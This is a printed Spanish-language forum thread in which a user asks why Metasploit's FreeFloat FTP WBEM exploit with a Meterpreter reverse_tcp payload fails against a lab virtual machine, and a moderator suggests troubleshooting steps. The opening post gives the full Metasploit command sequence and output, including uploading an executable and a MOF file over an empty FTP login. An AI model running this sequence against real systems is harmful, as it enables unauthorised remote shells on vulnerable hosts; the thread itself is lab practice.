Imprimir Página - Exploit FreeFloat

Título: Exploit FreeFloat
Publicado por: RxB en Octubre 10, 2015, 09:51:13 PM

Hola Gente,

Tengo instalado en una máquina virtual con SO windows / el programa vulnerable FreeFloat.
Cuando lanzo el exploit desde metasploit realiza todos los procesos y no se logra la conexión. Alguien puede ayudarme?

(http://file:///root/Escritorio/freefloat.jpeg)

msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(freefloatftp_wbem) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(freefloatftp_wbem) > exploit

Exploit running as background job.
Started reverse handler on 192.168.1.102:4444
msf exploit(freefloatftp_wbem) >
Server started.
192.168.1.106:21 - Trying to upload SxofqwKjdO.exe
192.168.1.106:21 - Sending empty login...
192.168.1.106:21 - Empty authentication was successful
192.168.1.106:21 - Set binary mode
192.168.1.106:21 - Set active mode "192,168,1,102,31,144"
192.168.1.106:21 - Trying to upload pvzBH.mof
192.168.1.106:21 - Sending empty login...
192.168.1.106:21 - Empty authentication was successful
192.168.1.106:21 - Set binary mode
192.168.1.106:21 - Set active mode "192,168,1,102,31,144"

msf exploit(freefloatftp_wbem) >

Título: Re:Exploit FreeFloat
Publicado por: ANTRAX en Octubre 23, 2015, 09:19:55 AM

Hola @RxB (https://underc0de.org/foro/index.php?action=profile;u=49994),

Sabes si hay un firewall en el medio? O si el puerto está efectivamente abierto?

Saludos!
ANTRAX

Título: Re:Exploit FreeFloat
Publicado por: RxB en Octubre 23, 2015, 11:30:40 AM

El puerto está abierto con firewall desactivado.

Título: Re:Exploit FreeFloat
Publicado por: ANTRAX en Octubre 23, 2015, 11:39:56 AM

Comparaste la versión de FreeFloat con la del expoit?

Saludos!
ANTRAX

Título: Re:Exploit FreeFloat
Publicado por: RxB en Octubre 23, 2015, 12:26:45 PM

Si, la versión es exactamente la misma q aparece en los targets del exploit.

Título: Re:Exploit FreeFloat
Publicado por: ANTRAX en Octubre 23, 2015, 02:38:49 PM

Te aseguraste de que FreeFloat FTP Server este en el modo "Start"?
Es decir, para que este exploit funcione, necesita que el programa esté corriendo, y ahi se sube el NFSIf.exe y kQfzssDlqDGZO.mof en el sistema del usuario, devolviendo una sesion meterpreter. si es que se logra una conexión exitosa

Saludos!
ANTRAX

Título: Re:Exploit FreeFloat
Publicado por: RxB en Octubre 23, 2015, 02:55:30 PM

Si, estaba en modo start corriendo en el puerto 21. Comienza a subir el archivo SxofqwKjdO.exe, se autentica en forma correcta y queda colgado. La prueba la realicé sobre una máquina virtual. Tal vez tenga q ver con algún error de config en la máquina virtual

Título: Re:Exploit FreeFloat
Publicado por: ANTRAX en Octubre 23, 2015, 03:08:23 PM

Puede ser, no tienes otra pc para probarlo? asi vas descartando problemas. Por que los pasos que describiste que hiciste, estan todos bien.

Saludos!
ANTRAX

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: RxB en Octubre 10, 2015, 09:51:13 PM